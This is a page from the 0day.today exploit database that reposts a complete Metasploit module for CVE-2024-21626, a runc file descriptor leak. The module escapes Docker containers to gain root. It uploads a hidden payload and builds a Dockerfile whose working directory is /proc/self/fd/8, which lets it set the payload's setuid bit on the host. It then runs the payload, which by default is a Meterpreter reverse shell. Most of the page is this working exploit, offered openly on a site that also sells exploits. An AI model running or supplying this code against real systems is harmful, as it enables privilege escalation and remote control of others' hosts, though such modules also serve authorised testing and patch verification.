0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
runc 1.1.11 File Descriptor Leak Privilege Escalation Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'runc (docker) File Descriptor Leak Privilege Escalation', 'Description' => %q{ All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine, and Kubernetes are vulnerable to an arbitrary file write. Due to a file descriptor leak it is possible to mount the host file system with the permissions of runc (typically root). Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Rory McNamara' # Discovery ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'], [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'], [ 'CVE', '2024-21626'] ], 'DisclosureDate' => '2024-01-31', 'DefaultTarget' => 0, 'Notes' => { 'AKA' => ['Leaky Vessels'], 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'MeterpreterTryToFork' => true } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]), OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]), OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]), ] end def base_dir datastore['WritableDir'].to_s end def check sys_info = get_sysinfo unless sys_info[:distro] == 'ubuntu' return CheckCode::Safe('Check method only available for Ubuntu systems') end return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc') # Check the app is installed and the version, debian based example package = cmd_exec('runc --version') package = package.split[2] # runc, version, <the actual version> if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2 package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched return CheckCode::Appears("Vulnerable runc version #{package} detected") end unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln return CheckCode::Appears("Vulnerable runc version #{package} detected") end CheckCode::Safe("runc #{package} is not vulnerable") end def exploit # Check if we're already root if !datastore['ForceExploit'] && is_root? fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # create directory to write all our files to dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" mkdir(dir) register_dirs_for_cleanup(dir) # Upload payload executable payload_path = "#{dir}/.#{rand_text_alphanumeric(5..10)}" vprint_status("Uploading Payload to #{payload_path}") write_file(payload_path, generate_payload_exe) register_file_for_cleanup(payload_path) # write docker file vprint_status("Uploading Dockerfile to #{dir}/Dockerfile") dockerfile = %(FROM #{datastore['DOCKERIMAGE']} WORKDIR /proc/self/fd/#{datastore['FILEDESCRIPTOR']} RUN cd #{'../' * 8} && chmod -R 777 #{dir[1..]} && chown -R root:root #{dir[1..]} && chmod u+s #{payload_path[1..]} ) write_file("#{dir}/Dockerfile", dockerfile) register_file_for_cleanup("#{dir}/Dockerfile") print_status('Building from Dockerfile to set our payload permissions') output = cmd_exec "cd #{dir} && docker build ." output.each_line { |line| vprint_status line.chomp } # delete our docker image if output =~ /Successfully built ([a-z0-9]+)$/ print_status("Removing created docker image #{Regexp.last_match(1)}") output = cmd_exec "docker image rm #{Regexp.last_match(1)}" output.each_line { |line| vprint_status line.chomp } end fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory" fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path print_status("Payload permissions set, executing payload (#{payload_path})...") cmd_exec "#{payload_path} &" end end # 0day.today [2024-06-02] #